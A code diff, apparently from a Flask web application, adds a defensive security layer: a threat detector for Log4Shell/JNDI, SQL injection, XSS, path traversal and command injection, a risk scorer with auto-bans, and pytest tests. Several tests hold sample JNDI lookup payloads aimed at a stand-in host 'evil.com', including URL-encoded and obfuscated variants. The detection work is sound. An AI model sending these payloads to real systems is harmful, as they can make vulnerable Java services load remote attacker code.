INSERT INTO user_risk_scores (user_id, risk_score, last_seen, created_at, updated_at)
VALUES (?, ?, ?, ?, ?)
""",
(int(user_id), user_score, now_str, now_str, now_str),
)
return _ScoreUpdateResult(ip_score=ip_score, user_score=user_score)
def _get_auto_ban_actions(
self,
cursor,
ip: str,
user_id: Optional[int],
threat_type: str,
score: int,
update: _ScoreUpdateResult,
) -> tuple[Optional["_BanAction"], Optional["_BanAction"]]:
ip_action: Optional[_BanAction] = None
user_action: Optional[_BanAction] = None
if threat_type == C.THREAT_TYPE_JNDI_INJECTION:
if ip:
ip_action = _BanAction(reason="JNDI injection detected", permanent=True)
if user_id is not None:
user_action = _BanAction(reason="JNDI injection detected", permanent=True)
return ip_action, user_action
if ip and update.ip_score >= 100:
ip_action = _BanAction(reason="Risk score reached 100", duration_hours=self.auto_ban_duration_hours)
if user_id is not None and update.user_score >= 100:
user_action = _BanAction(reason="Risk score reached 100", duration_hours=self.auto_ban_duration_hours)
if score < self.high_risk_threshold:
return ip_action, user_action
window_start = (get_cst_now() - timedelta(hours=self.high_risk_window_hours)).strftime("%Y-%m-%d %H:%M:%S")
if ip:
cursor.execute(
"""
SELECT COUNT(*) AS cnt
FROM threat_events
WHERE ip = ? AND score >= ? AND created_at >= ?
""",
(ip, int(self.high_risk_threshold), window_start),
)
row = cursor.fetchone()
cnt = int(row["cnt"]) if row else 0
if cnt >= self.high_risk_permanent_ban_count:
ip_action = _BanAction(reason="High-risk threats threshold reached", permanent=True)
if user_id is not None:
cursor.execute(
"""
SELECT COUNT(*) AS cnt
FROM threat_events
WHERE user_id = ? AND score >= ? AND created_at >= ?
""",
(int(user_id), int(self.high_risk_threshold), window_start),
)
row = cursor.fetchone()
cnt = int(row["cnt"]) if row else 0
if cnt >= self.high_risk_permanent_ban_count:
user_action = _BanAction(reason="High-risk threats threshold reached", permanent=True)
return ip_action, user_action
def _get_behavior_bonus(self, ip: str, user_id: Optional[int]) -> int:
return 0
def _hours_since(self, dt_str: Optional[str], now) -> int:
if not dt_str:
return 0
try:
dt = parse_cst_datetime(str(dt_str))
except Exception:
return 0
seconds = (now - dt).total_seconds()
if seconds <= 0:
return 0
return int(seconds // 3600)
def _apply_hourly_decay(self, score: int, hours: int) -> int:
score_int = max(0, int(score))
if score_int <= 0 or hours <= 0:
return score_int
decayed = int(math.floor(score_int * (0.9**int(hours))))
return max(0, min(100, decayed))

316
security/threat_detector.py Normal file
View File

@@ -0,0 +1,316 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
from dataclasses import dataclass
from typing import Any, Iterable, List, Optional, Tuple
from urllib.parse import unquote_plus
from . import constants as C
@dataclass
class ThreatResult:
threat_type: str
score: int
field_name: str
rule: str = ""
matched: str = ""
value_preview: str = ""
def to_dict(self) -> dict:
return {
"threat_type": self.threat_type,
"score": int(self.score),
"field_name": self.field_name,
"rule": self.rule,
"matched": self.matched,
"value_preview": self.value_preview,
}
class ThreatDetector:
def __init__(
self,
*,
max_value_length: int = 4096,
max_decode_rounds: int = 2,
) -> None:
self.max_value_length = max(64, int(max_value_length))
self.max_decode_rounds = max(0, int(max_decode_rounds))
def scan_input(self, value: Any, field_name: str = "value") -> List[ThreatResult]:
"""扫描单个输入值(支持 dict/list 等嵌套结构)。"""
results: List[ThreatResult] = []
for sub_field, leaf in self._flatten_value(value, field_name):
text = self._stringify(leaf)
if not text:
continue
if len(text) > self.max_value_length:
text = text[: self.max_value_length]
results.extend(self._scan_text(text, sub_field))
results.sort(key=lambda r: int(r.score), reverse=True)
return results
def scan_request(self, request: Any) -> List[ThreatResult]:
"""扫描整个请求对象(兼容 Flask Request / dict 风格对象)。"""
results: List[ThreatResult] = []
for field_name, value in self._extract_request_fields(request):
results.extend(self.scan_input(value, field_name))
results.sort(key=lambda r: int(r.score), reverse=True)
return results
# ==================== Internal scanning ====================
def _scan_text(self, text: str, field_name: str) -> List[ThreatResult]:
hits: List[ThreatResult] = []
for check in [
self._check_jndi_injection,
self._check_sql_injection,
self._check_xss,
self._check_path_traversal,
self._check_command_injection,
]:
result = check(text)
if result:
threat_type, score, rule, matched = result
hits.append(
ThreatResult(
threat_type=threat_type,
score=int(score),
field_name=field_name,
rule=rule,
matched=matched,
value_preview=self._preview(text),
)
)
return hits
def _check_jndi_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
# 1) Direct match
m = C.JNDI_DIRECT_RE.search(text)
if m:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_DIRECT, "JNDI_DIRECT", m.group(0))
# 2) URL-decoded
decoded = self._multi_unquote(text)
if decoded != text:
m2 = C.JNDI_DIRECT_RE.search(decoded)
if m2:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_DIRECT, "JNDI_DIRECT_URL_DECODED", m2.group(0))
# 3) Obfuscation patterns (raw/decoded)
for candidate, rule in [(text, "JNDI_OBFUSCATED"), (decoded, "JNDI_OBFUSCATED_URL_DECODED")]:
m3 = C.JNDI_OBFUSCATED_RE.search(candidate)
if m3:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_OBFUSCATED, rule, m3.group(0))
# 4) Try limited de-obfuscation to reveal ${jndi:...}
deobf = self._deobfuscate_log4j(decoded)
if deobf and deobf != decoded:
m4 = C.JNDI_DIRECT_RE.search(deobf)
if m4:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_OBFUSCATED, "JNDI_DEOBFUSCATED", m4.group(0))
# 5) Nested expression heuristic
for candidate in [text, decoded]:
m5 = C.NESTED_EXPRESSION_RE.search(candidate)
if m5:
return (C.THREAT_TYPE_NESTED_EXPRESSION, C.SCORE_NESTED_EXPRESSION, "NESTED_EXPRESSION", m5.group(0))
return None
def _check_sql_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
candidates = [text, self._multi_unquote(text)]
for candidate in candidates:
m = C.SQLI_UNION_SELECT_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SQL_INJECTION, C.SCORE_SQL_INJECTION, "SQLI_UNION_SELECT", m.group(0))
m = C.SQLI_OR_1_EQ_1_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SQL_INJECTION, C.SCORE_SQL_INJECTION, "SQLI_OR_1_EQ_1", m.group(0))
return None
def _check_xss(self, text: str) -> Optional[Tuple[str, int, str, str]]:
candidates = [text, self._multi_unquote(text)]
for candidate in candidates:
m = C.XSS_SCRIPT_TAG_RE.search(candidate)
if m:
return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_SCRIPT_TAG", m.group(0))
m = C.XSS_JS_PROTOCOL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_JS_PROTOCOL", m.group(0))
m = C.XSS_INLINE_EVENT_HANDLER_RE.search(candidate)
if m:
return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_INLINE_EVENT_HANDLER", m.group(0))
return None
def _check_path_traversal(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates = [text, decoded]
for candidate in candidates:
m = C.PATH_TRAVERSAL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_PATH_TRAVERSAL, C.SCORE_PATH_TRAVERSAL, "PATH_TRAVERSAL", m.group(0))
return None
def _check_command_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates = [text, decoded]
for candidate in candidates:
m = C.CMD_INJECTION_SUBSHELL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_COMMAND_INJECTION, C.SCORE_COMMAND_INJECTION, "CMD_SUBSHELL", m.group(0))
m = C.CMD_INJECTION_OPERATOR_WITH_CMD_RE.search(candidate)
if m:
return (C.THREAT_TYPE_COMMAND_INJECTION, C.SCORE_COMMAND_INJECTION, "CMD_OPERATOR_WITH_CMD", m.group(0))
return None
# ==================== Helpers ====================
def _preview(self, text: str, limit: int = 160) -> str:
s = text.replace("\n", "\\n").replace("\r", "\\r").replace("\t", "\\t")
if len(s) <= limit:
return s
return s[: limit - 3] + "..."
def _stringify(self, value: Any) -> str:
if value is None:
return ""
if isinstance(value, bytes):
try:
return value.decode("utf-8", errors="ignore")
except Exception:
return ""
try:
return str(value)
except Exception:
return ""
def _multi_unquote(self, text: str) -> str:
s = text
for _ in range(self.max_decode_rounds):
try:
nxt = unquote_plus(s)
except Exception:
break
if nxt == s:
break
s = nxt
return s
def _deobfuscate_log4j(self, text: str) -> str:
# Replace ${...:-x} with x (including ${::-x}).
# This is intentionally conservative to reduce false positives.
import re
s = text
pattern = re.compile(r"\$\{[^{}]{0,50}:-([a-zA-Z])\}")
for _ in range(3):
nxt = pattern.sub(lambda m: m.group(1), s)
if nxt == s:
break
s = nxt
return s
def _flatten_value(self, value: Any, field_name: str) -> Iterable[Tuple[str, Any]]:
if isinstance(value, dict):
for k, v in value.items():
key = self._stringify(k) or "key"
sub_name = f"{field_name}.{key}" if field_name else key
yield from self._flatten_value(v, sub_name)
return
if isinstance(value, (list, tuple, set)):
for i, v in enumerate(value):
sub_name = f"{field_name}[{i}]"
yield from self._flatten_value(v, sub_name)
return
yield (field_name, value)
def _extract_request_fields(self, request: Any) -> List[Tuple[str, Any]]:
# dict-like input (useful for unit tests / non-Flask callers)
if isinstance(request, dict):
out: List[Tuple[str, Any]] = []
for k, v in request.items():
out.append((self._stringify(k) or "request", v))
return out
out: List[Tuple[str, Any]] = []
# path / method
for attr_name in ["method", "path", "full_path", "url", "remote_addr"]:
try:
v = getattr(request, attr_name, None)
except Exception:
v = None
if v:
out.append((attr_name, v))
# args / form (Flask MultiDict)
out.extend(self._extract_multidict(getattr(request, "args", None), "args"))
out.extend(self._extract_multidict(getattr(request, "form", None), "form"))
# headers
try:
headers = getattr(request, "headers", None)
if headers is not None:
try:
items = headers.items()
except Exception:
items = []
for k, v in items:
out.append((f"headers.{self._stringify(k)}", v))
except Exception:
pass
# cookies
try:
cookies = getattr(request, "cookies", None)
if isinstance(cookies, dict):
for k, v in cookies.items():
out.append((f"cookies.{self._stringify(k)}", v))
except Exception:
pass
# json body
data = None
try:
get_json = getattr(request, "get_json", None)
if callable(get_json):
data = get_json(silent=True)
except Exception:
data = None
if data is not None:
for name, v in self._flatten_value(data, "json"):
out.append((name, v))
return out
# raw body (as a fallback)
try:
get_data = getattr(request, "get_data", None)
if callable(get_data):
raw = get_data(cache=True, as_text=True)
if raw:
out.append(("body", raw))
except Exception:
pass
return out
def _extract_multidict(self, md: Any, prefix: str) -> List[Tuple[str, Any]]:
out: List[Tuple[str, Any]] = []
if md is None:
return out
try:
items = md.items(multi=True)
except Exception:
try:
items = md.items()
except Exception:
return out
for k, v in items:
out.append((f"{prefix}.{self._stringify(k)}", v))
return out

View File

@@ -0,0 +1,249 @@
from __future__ import annotations
from datetime import timedelta
import pytest
from flask import Flask
import db_pool
from db.schema import ensure_schema
from db.utils import get_cst_now
from security.blacklist import BlacklistManager
from security.risk_scorer import RiskScorer
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "admin_security_api_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def _make_app() -> Flask:
from routes.admin_api.security import security_bp
app = Flask(__name__)
app.config.update(SECRET_KEY="test-secret", TESTING=True)
app.register_blueprint(security_bp)
return app
def _login_admin(client) -> None:
with client.session_transaction() as sess:
sess["admin_id"] = 1
sess["admin_username"] = "admin"
def _insert_threat_event(*, threat_type: str, score: int, ip: str, user_id: int | None, created_at: str, payload: str):
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO threat_events (threat_type, score, ip, user_id, request_path, value_preview, created_at)
VALUES (?, ?, ?, ?, ?, ?, ?)
""",
(threat_type, int(score), ip, user_id, "/api/test", payload, created_at),
)
conn.commit()
def test_dashboard_requires_admin(_test_db):
app = _make_app()
client = app.test_client()
resp = client.get("/api/admin/security/dashboard")
assert resp.status_code == 403
assert resp.get_json() == {"error": "需要管理员权限"}
def test_dashboard_counts_and_payload_truncation(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
now = get_cst_now()
within_24h = now.strftime("%Y-%m-%d %H:%M:%S")
within_24h_2 = (now - timedelta(hours=1)).strftime("%Y-%m-%d %H:%M:%S")
older = (now - timedelta(hours=25)).strftime("%Y-%m-%d %H:%M:%S")
long_payload = "x" * 300
_insert_threat_event(
threat_type="sql_injection",
score=90,
ip="1.2.3.4",
user_id=10,
created_at=within_24h,
payload=long_payload,
)
_insert_threat_event(
threat_type="xss",
score=70,
ip="2.3.4.5",
user_id=11,
created_at=within_24h_2,
payload="short",
)
_insert_threat_event(
threat_type="path_traversal",
score=60,
ip="9.9.9.9",
user_id=None,
created_at=older,
payload="old",
)
manager = BlacklistManager()
manager.ban_ip("8.8.8.8", reason="manual", duration_hours=1, permanent=False)
manager._ban_user_internal(123, reason="manual", duration_hours=1, permanent=False)
resp = client.get("/api/admin/security/dashboard")
assert resp.status_code == 200
data = resp.get_json()
assert data["threat_events_24h"] == 2
assert data["banned_ip_count"] == 1
assert data["banned_user_count"] == 1
recent = data["recent_threat_events"]
assert isinstance(recent, list)
assert len(recent) == 3
payload_preview = recent[0]["value_preview"]
assert isinstance(payload_preview, str)
assert len(payload_preview) <= 200
assert payload_preview.endswith("...")
def test_threats_pagination_and_filters(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
now = get_cst_now()
t1 = (now - timedelta(minutes=1)).strftime("%Y-%m-%d %H:%M:%S")
t2 = (now - timedelta(minutes=2)).strftime("%Y-%m-%d %H:%M:%S")
t3 = (now - timedelta(minutes=3)).strftime("%Y-%m-%d %H:%M:%S")
_insert_threat_event(threat_type="sql_injection", score=90, ip="1.1.1.1", user_id=1, created_at=t1, payload="a")
_insert_threat_event(threat_type="xss", score=70, ip="2.2.2.2", user_id=2, created_at=t2, payload="b")
_insert_threat_event(threat_type="nested_expression", score=80, ip="3.3.3.3", user_id=3, created_at=t3, payload="c")
resp = client.get("/api/admin/security/threats?page=1&per_page=2")
assert resp.status_code == 200
data = resp.get_json()
assert data["total"] == 3
assert len(data["items"]) == 2
resp2 = client.get("/api/admin/security/threats?page=2&per_page=2")
assert resp2.status_code == 200
data2 = resp2.get_json()
assert data2["total"] == 3
assert len(data2["items"]) == 1
resp3 = client.get("/api/admin/security/threats?event_type=sql_injection")
assert resp3.status_code == 200
data3 = resp3.get_json()
assert data3["total"] == 1
assert data3["items"][0]["threat_type"] == "sql_injection"
resp4 = client.get("/api/admin/security/threats?severity=high")
assert resp4.status_code == 200
data4 = resp4.get_json()
assert data4["total"] == 2
assert {item["threat_type"] for item in data4["items"]} == {"sql_injection", "nested_expression"}
def test_ban_and_unban_ip(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
resp = client.post("/api/admin/security/ban-ip", json={"ip": "7.7.7.7", "reason": "test", "duration_hours": 1})
assert resp.status_code == 200
assert resp.get_json()["success"] is True
list_resp = client.get("/api/admin/security/banned-ips")
assert list_resp.status_code == 200
payload = list_resp.get_json()
assert payload["count"] == 1
assert payload["items"][0]["ip"] == "7.7.7.7"
resp2 = client.post("/api/admin/security/unban-ip", json={"ip": "7.7.7.7"})
assert resp2.status_code == 200
assert resp2.get_json()["success"] is True
list_resp2 = client.get("/api/admin/security/banned-ips")
assert list_resp2.status_code == 200
assert list_resp2.get_json()["count"] == 0
def test_risk_endpoints_and_cleanup(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
scorer = RiskScorer(auto_ban_enabled=False)
scorer.record_threat("4.4.4.4", 44, threat_type="xss", score=20, request_path="/", payload="<script>")
ip_resp = client.get("/api/admin/security/ip-risk/4.4.4.4")
assert ip_resp.status_code == 200
ip_data = ip_resp.get_json()
assert ip_data["risk_score"] == 20
assert len(ip_data["threat_history"]) >= 1
user_resp = client.get("/api/admin/security/user-risk/44")
assert user_resp.status_code == 200
user_data = user_resp.get_json()
assert user_data["risk_score"] == 20
assert len(user_data["threat_history"]) >= 1
# Prepare decaying scores and expired ban
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
("5.5.5.5", old_ts, old_ts, old_ts),
)
cursor.execute(
"""
INSERT INTO ip_blacklist (ip, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
""",
("6.6.6.6", "expired", old_ts, old_ts),
)
conn.commit()
manager = BlacklistManager()
assert manager.is_ip_banned("6.6.6.6") is False # expired already
cleanup_resp = client.post("/api/admin/security/cleanup", json={})
assert cleanup_resp.status_code == 200
assert cleanup_resp.get_json()["success"] is True
# Score decayed by cleanup
assert RiskScorer().get_ip_score("5.5.5.5") == 81

View File

@@ -0,0 +1,63 @@
from __future__ import annotations
import uuid
from security import HoneypotResponder
def test_should_use_honeypot_threshold():
responder = HoneypotResponder()
assert responder.should_use_honeypot(79) is False
assert responder.should_use_honeypot(80) is True
assert responder.should_use_honeypot(100) is True
def test_generate_fake_response_email():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/forgot-password")
assert resp["success"] is True
assert resp["message"] == "邮件已发送"
def test_generate_fake_response_register_contains_fake_uuid():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/register")
assert resp["success"] is True
assert "user_id" in resp
uuid.UUID(resp["user_id"])
def test_generate_fake_response_login():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/login")
assert resp == {"success": True}
def test_generate_fake_response_generic():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/tasks/run")
assert resp["success"] is True
assert resp["message"] == "操作成功"
def test_delay_response_ranges():
responder = HoneypotResponder()
assert responder.delay_response(0) == 0
assert responder.delay_response(20) == 0
d = responder.delay_response(21)
assert 0.5 <= d <= 1.0
d = responder.delay_response(50)
assert 0.5 <= d <= 1.0
d = responder.delay_response(51)
assert 1.0 <= d <= 3.0
d = responder.delay_response(80)
assert 1.0 <= d <= 3.0
d = responder.delay_response(81)
assert 3.0 <= d <= 8.0
d = responder.delay_response(100)
assert 3.0 <= d <= 8.0

View File

@@ -0,0 +1,72 @@
from __future__ import annotations
import random
import security.response_handler as rh
from security import ResponseAction, ResponseHandler, ResponseStrategy
def test_get_strategy_banned_blocks():
handler = ResponseHandler(rng=random.Random(0))
strategy = handler.get_strategy(10, is_banned=True)
assert strategy.action == ResponseAction.BLOCK
assert strategy.delay_seconds == 0
assert strategy.message == "访问被拒绝"
def test_get_strategy_allow_levels():
handler = ResponseHandler(rng=random.Random(0))
s = handler.get_strategy(0)
assert s.action == ResponseAction.ALLOW
assert s.delay_seconds == 0
assert s.captcha_level == 1
s = handler.get_strategy(21)
assert s.action == ResponseAction.ALLOW
assert s.delay_seconds == 0
assert s.captcha_level == 2
def test_get_strategy_delay_ranges():
handler = ResponseHandler(rng=random.Random(0))
s = handler.get_strategy(41)
assert s.action == ResponseAction.DELAY
assert 1.0 <= s.delay_seconds <= 2.0
s = handler.get_strategy(61)
assert s.action == ResponseAction.DELAY
assert 2.0 <= s.delay_seconds <= 5.0
s = handler.get_strategy(81)
assert s.action == ResponseAction.HONEYPOT
assert 3.0 <= s.delay_seconds <= 8.0
def test_apply_delay_uses_time_sleep(monkeypatch):
handler = ResponseHandler(rng=random.Random(0))
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=1.234)
called = {"count": 0, "seconds": None}
def fake_sleep(seconds):
called["count"] += 1
called["seconds"] = seconds
monkeypatch.setattr(rh.time, "sleep", fake_sleep)
handler.apply_delay(strategy)
assert called["count"] == 1
assert called["seconds"] == 1.234
def test_get_captcha_requirement():
handler = ResponseHandler(rng=random.Random(0))
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.ALLOW, captcha_level=2))
assert req == {"required": True, "level": 2}
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.BLOCK, captcha_level=2))
assert req == {"required": False, "level": 2}

179
tests/test_risk_scorer.py Normal file
View File

@@ -0,0 +1,179 @@
from __future__ import annotations
from datetime import timedelta
import pytest
import db_pool
from db.schema import ensure_schema
from db.utils import get_cst_now
from security import constants as C
from security.blacklist import BlacklistManager
from security.risk_scorer import RiskScorer
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "risk_scorer_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def test_record_threat_updates_scores_and_combined(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "1.2.3.4"
user_id = 123
assert scorer.get_ip_score(ip) == 0
assert scorer.get_user_score(user_id) == 0
assert scorer.get_combined_score(ip, user_id) == 0
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=30, request_path="/login", payload="x")
assert scorer.get_ip_score(ip) == 30
assert scorer.get_user_score(user_id) == 30
assert scorer.get_combined_score(ip, user_id) == 30
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=80, request_path="/login", payload="y")
assert scorer.get_ip_score(ip) == 100
assert scorer.get_user_score(user_id) == 100
assert scorer.get_combined_score(ip, user_id) == 100
def test_auto_ban_on_score_100(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "5.6.7.8"
user_id = 456
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=100, request_path="/api", payload="boom")
assert manager.is_ip_banned(ip) is True
assert manager.is_user_banned(user_id) is True
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None
def test_jndi_injection_permanent_ban(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "9.9.9.9"
user_id = 999
scorer.record_threat(ip, user_id, threat_type=C.THREAT_TYPE_JNDI_INJECTION, score=100, request_path="/", payload="${jndi:ldap://x}")
assert manager.is_ip_banned(ip) is True
assert manager.is_user_banned(user_id) is True
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
def test_high_risk_three_times_permanent_ban(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager, high_risk_threshold=80, high_risk_permanent_ban_count=3)
ip = "10.0.0.1"
user_id = 1
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="a")
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="b")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None # score hits 100 => temporary ban first
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="c")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None # 3 high-risk threats => permanent
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
def test_decay_scores_hourly_10_percent(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "3.3.3.3"
user_id = 11
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
(ip, old_ts, old_ts, old_ts),
)
cursor.execute(
"""
INSERT INTO user_risk_scores (user_id, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
(user_id, old_ts, old_ts, old_ts),
)
conn.commit()
scorer.decay_scores()
assert scorer.get_ip_score(ip) == 81
assert scorer.get_user_score(user_id) == 81

View File

@@ -0,0 +1,155 @@
from __future__ import annotations
import pytest
from flask import Flask, g, jsonify
from flask_login import LoginManager
import db_pool
from db.schema import ensure_schema
from security import init_security_middleware
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "security_middleware_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def _make_app(monkeypatch, _test_db, *, security_enabled: bool = True, honeypot_enabled: bool = True) -> Flask:
import security.middleware as sm
import security.response_handler as rh
# 避免测试因风控延迟而变慢
monkeypatch.setattr(rh.time, "sleep", lambda _seconds: None)
# 每个测试用例保持 handler/honeypot 的懒加载状态
sm.handler = None
sm.honeypot = None
app = Flask(__name__)
app.config.update(
SECRET_KEY="test-secret",
TESTING=True,
SECURITY_ENABLED=bool(security_enabled),
HONEYPOT_ENABLED=bool(honeypot_enabled),
SECURITY_LOG_LEVEL="CRITICAL", # 降低测试日志噪音
)
login_manager = LoginManager()
login_manager.init_app(app)
@login_manager.user_loader
def _load_user(_user_id: str):
return None
init_security_middleware(app)
return app
def _client_get(app: Flask, path: str, *, ip: str = "1.2.3.4"):
return app.test_client().get(path, environ_overrides={"REMOTE_ADDR": ip})
def test_middleware_blocks_banned_ip(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/ping")
def _ping():
return jsonify({"ok": True})
import security.middleware as sm
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
resp = _client_get(app, "/api/ping", ip="1.2.3.4")
assert resp.status_code == 503
assert resp.get_json() == {"error": "服务暂时繁忙,请稍后重试"}
def test_middleware_skips_static_requests(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/static/test")
def _static_test():
return "ok"
import security.middleware as sm
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
resp = _client_get(app, "/static/test", ip="1.2.3.4")
assert resp.status_code == 200
assert resp.get_data(as_text=True) == "ok"
def test_middleware_honeypot_short_circuits_side_effects(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db, honeypot_enabled=True)
called = {"count": 0}
@app.get("/api/side-effect")
def _side_effect():
called["count"] += 1
return jsonify({"real": True})
resp = _client_get(app, "/api/side-effect?q=${${a}}", ip="9.9.9.9")
assert resp.status_code == 200
payload = resp.get_json()
assert isinstance(payload, dict)
assert payload.get("success") is True
assert called["count"] == 0
def test_middleware_fails_open_on_internal_errors(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/ok")
def _ok():
return jsonify({"ok": True, "risk_score": getattr(g, "risk_score", None)})
import security.middleware as sm
def boom(*_args, **_kwargs):
raise RuntimeError("boom")
monkeypatch.setattr(sm.blacklist, "is_ip_banned", boom)
monkeypatch.setattr(sm.detector, "scan_input", boom)
resp = _client_get(app, "/api/ok", ip="2.2.2.2")
assert resp.status_code == 200
assert resp.get_json()["ok"] is True
def test_middleware_sets_request_context_fields(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/context")
def _context():
strategy = getattr(g, "response_strategy", None)
action = getattr(getattr(strategy, "action", None), "value", None)
return jsonify({"risk_score": getattr(g, "risk_score", None), "action": action})
resp = _client_get(app, "/api/context", ip="8.8.8.8")
assert resp.status_code == 200
assert resp.get_json() == {"risk_score": 0, "action": "allow"}

View File

@@ -0,0 +1,69 @@
from flask import Flask, request
from security import constants as C
from security.threat_detector import ThreatDetector
def test_jndi_direct_scores_100():
detector = ThreatDetector()
results = detector.scan_input("${jndi:ldap://evil.com/a}", "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_jndi_encoded_scores_100():
detector = ThreatDetector()
results = detector.scan_input("%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D", "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_jndi_obfuscated_scores_100():
detector = ThreatDetector()
payload = "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.com/a}"
results = detector.scan_input(payload, "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_nested_expression_scores_80():
detector = ThreatDetector()
results = detector.scan_input("${${env:USER}}", "q")
